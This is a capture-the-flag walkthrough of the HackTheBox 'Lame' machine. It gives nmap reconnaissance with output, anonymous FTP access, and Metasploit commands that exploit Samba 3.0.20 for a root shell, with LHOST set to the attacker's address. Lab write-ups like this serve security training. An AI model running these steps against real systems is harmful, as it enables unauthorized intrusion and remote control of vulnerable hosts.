This is a walkthrough of the Lame machine from HackTheBox.

Folder Setup and Nmap Scan

mkdir lame && cd lame
mkdir nmap && sudo nmap -sC -sV -oA nmap/lame 10.10.10.3

Results of the Nmap Scan

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-20 05:51 EDT
Nmap scan report for 10-10-10-3.tpgi.com.au (10.10.10.3)
Host is up (0.037s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-05-20T05:51:47-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h59m29s, deviation: 2h49m45s, median: -32s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 57.17 seconds
    

Anonymous FTP Access

Anonymous FTP is enabled. Use anonymous as the username when prompted. Simply press ‘Enter’ when prompted for the password without typing anything.

ftp 10.10.10.3    

Found nothing interesting. Type ‘exit’ to quit the FTP session.

Exploiting vsftpd

The vsftpd version is vulnerable as shown from a searchsploit search.

However, attempting the Metasploit exploit for this vsftpd version failed. Moving on to Samba.

Exploiting Samba

Performing a searchsploit search for the Samba version running on the machine:

searchsploit samba 3.0.20

Returns 1 exploit.

Using Metasploit to Exploit Samba

Using the exploit and adjusting the necessary settings:

use 0
set RHOST 10.10.10.3
set LHOST <your_ip>
run

Root shell opened. Type shell to make it an interactive shell.